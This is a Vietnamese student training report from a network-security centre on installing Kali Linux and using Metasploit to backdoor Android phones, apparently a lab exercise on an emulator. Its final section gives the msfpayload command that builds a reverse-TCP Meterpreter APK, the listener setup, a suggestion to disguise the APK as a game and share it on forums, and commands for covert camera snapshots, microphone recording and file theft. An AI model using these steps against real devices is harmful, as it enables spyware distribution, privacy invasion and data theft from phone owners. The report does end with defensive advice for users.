bao cao athena 2
Post on 02-Jul-2015
116 Views
Preview:
DESCRIPTION
TRANSCRIPT
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO TUẦN
ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ
DỤNG ANDROID VÀ GỬI RA NGOÀI
CBHD: Võ Đỗ Thắng
SVTH: Nguyễn Đức Thái
Tp. HCM Ngày 29 Tháng 06 Năm 2014
Mục Lục
Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công vào Android. ........................ 1
1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux để xâm nhập vào máy
Android .................................................................................................................................................. 1
1.1. Tổng quan .............................................................................................................................. 1
1.2. Cải tiến của Kali Linux so với Backtrack. .......................................................................... 1
1.3. Cài đặt Kali Linux ................................................................................................................. 2
1.3.1. Chuẩn bị. ........................................................................................................................ 2
1.3.2. Cài đặt. ........................................................................................................................... 2
1.4. Tạo mã độc trên Kali Linux để xâm nhập Android. ........................................................ 15
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 1
Nội dung: Nghiên cứu Kali Linux, Sử dụng Kali Linux để tấn công
vào Android.
1. Nghiên cứu Kali Linux, các cơ chế tạo mã độc trên Kali Linux
để xâm nhập vào máy Android
1.1. Tổng quan
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để
kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux
là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng
sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã
công bố phiên bản mới của BackTrack có thên là Kali Linux (được xem như phiên bản
BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà
bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.
1.2. Cải tiến của Kali Linux so với Backtrack.
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu
trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có
được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập
nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan
trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói
của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu
trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem
xét hoặc thay đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến
trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta
có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính
là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay
USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá
mạng không dây.
Khả năng tùy biến cao
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 2
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối
với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như
GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều
hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta
đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ
dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không
phải cài lại mới hoàn toàn nữa
1.3. Cài đặt Kali Linux
1.3.1. Chuẩn bị.
File iso Kali Linux: http://www.kali.org/downloads/
Máy có cài sẵn Vmware.
1.3.2. Cài đặt.
Đầu tiên ta cần download Kali Linux tại link sau http://www.kali.org/downloads/.
Chọn phiên bản phù hợp tiến hành download. Ở đây chọn phiên bản dành cho
windowns 32 bit download bằng link trực tiếp. Sau khi có file iso ta tiến hành cài đặt
Kali Linux trên máy ảo.
Khởi động VMwarre, ở góc phải trên màn hình chọn File -> New Virtual
Machine....
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 3
Hinh 12. Chon phương thức cái đặt.
Chọn Typical, nhấn Next để tiếp tục.
Hinh 33. Tim đường dẫn đến file iso Kali Linux.
Chọn Installer disc image file, nhấn Browse… tìm đường dẫn đến file iso của
Kali Linux sau đó nhấn Next để tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 4
Hinh 34. Chọn dung lượng đĩa.
Thiết đặt dung lượng tối đa dùng để cài đặt Kali Linux sau đó chọn Next.
Hinh 35. Xác nhận cài Đặt.
Chọn Finish để xác nhận tiến hành cài đặt.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 5
Hinh 36. Cài đặt Kali Linux.
Tại đây ta chọn Graphical install => Enter để tiến hành cài đặt trực quan bằng
giao diện.
Hinh 37. Chọn Ngôn Ngữ.
Tiến hành chọn lựa ngôn ngữ (ở đây chọn English), nhấn continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 6
Hinh 38. Chọn khu vực.
Lựa chọn khu vực ta chọn other => Continue.
Hinh 39. Khu vực Asia.
Tiếp tục chọn khu vực là Asia => Continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 7
Hinh 20. Chọn quốc gia Viet Nam.
Chọn quốc gia là Viet Nam => Continue.
Hinh 41. Chọn bảng mã.
Chọn bảng mã là United States – en_US.UTF. Bảng mã này gồm đầy đủ các ký
tự Latinh đồng thời hỗ trợ Tiếng Việt. Nhấn Continue để tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 8
Hinh 42. Chọn kiểu bàn phím.
Chọn kiểu bàn phím Ameican English => Continue.
Hinh 43. Đặt Hostname.
Tiếp theo là thiết đặt mạng. Đặt tên Hostname là bắt buộc. Ta có thể đặt tên bất kỳ
nhưng không thể có khoảng trắng. Nhấn Continue để tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 9
Hinh 44. Đặt Domain name.
Có thể bỏ trống Domain name => Continue.
Hinh 43. Đặt root password.
Điền hai lần Root password giống nhau (nhớ password đã đặt để sau này đăng
nhập) => Continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 10
Hinh 44. Tùy chọn ổ đĩa.
Tùy chọn ổ đĩa cài đặt. Ở đây ta chọn use entire disk -> continue.
Hinh 45. Chọn ổ đĩa cài đặt.
Tiếp tục nhấn Continue.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 11
Hinh 46. Phương thức cài đặt ổ đĩa.
Chọn All file in one partion => Continue.
Hinh 47. Xác nhận thông số cài đặt.
Kiểm tra thiết đặt thông tin ổ đĩa. Nếu có sai sót chọn Go Back để sửa đổi. Chọn
Continue tiếp tục.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 12
Hinh 50. Xác nhận định dạng ổ đĩa.
Chọn Yes để xác nhận thay đổi ổ đĩa => Continue để tiến trình bắt đầu copy file
và cài đặt Kali Linux.
Hinh 51. Cài đặt bắt đầu.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 13
Hinh 52. Tìm kiếm cập nhật qua internet.
Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng.
Ta chọn No để nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong).
Hinh 53. Xác nhận cài đặt GRUD.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 14
Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta
chọn Yes => Continue.
Hinh 54. Xác nhận cài đặt thành công.
Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ
thực hiện xoa một số file dư thừa sau khi cài đặt rồi khởi động lại.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 15
Hinh 55. Đăng nhập Kali Linux.
Sau khi khởi động xong ta nhập User là root va password được đặt ở trên để đăng
nhập. Như vậy là ta đã hoàn thành cài đặt xong Kali Linux.
1.4. Tạo mã độc trên Kali Linux để xâm nhập Android.
Trước khi tiến hành ta nên thiết lập phần Network như sau:
Vào VM => Settings... ở thanh lựa chọn của Vmware
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 16
Vào Network Adapter và chọn Bridged: connection directly to the physical
network
Vào Edit => Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn adapter
của máy thật
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 17
Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu
tiên ta cần tạo 1 file apk có chứa backdoor bằng cách:
Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 18
Sử dụng lệnh msfpayload android/meterpreter/reverse_tcp
lhost=192.168.240.132 lport=4444 R > /root/Desktop/App.apk để tạo backdoor. Với
192.168.240.132 là ip đã tìm được ở trên.
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 19
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng
cách gõ lệnh sau:
use exploit/multi/handler
set payload /meterpreter/reverse_tcp
set lhost 192.168.240.132 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set port 4444 – nhập port giống với port khi tạo payload ở trên.
exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk
đến các máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va
tiến hành chia sẻ trên forum. Ở đây thử với một máy Galaxy Nexus One giả lập, tải về
App.apk, cài đặt:
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 20
Khởi động ứng dụng vậy là ta đã kết nối thành công tới máy Android này, ở
msfconsole sẽ như sau:
Để xem tất cả các lệnh hỗ trợ nhập help
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 21
Để xem thông tin về máy, nhập lệnh SysInfo
Xem thông tin card mạng nhập lệnh ipconfig:
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước. Ví dụ như sau:
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 22
File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root
của máy
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Ta được file ghi âm
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 23
Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download
App.apk
Và file này sẽ được tải về thư mục root của máy Kali
Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để
xem các file và quyền hạn cần để sử dụng.
CBHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN ĐỨC THÁI
Trang 24
Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng.
Mà các dữ liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được
lưu tại đây. Vi thế ta chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm
nhập đã được root (hack chiếm quyền điều khiển cao nhất).
Kết luận
Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách
sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy
Android về máy.
Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ
trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, không tiến
hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta đã có
thể xem như có toàn quyền kiểm soát máy Android đó.
top related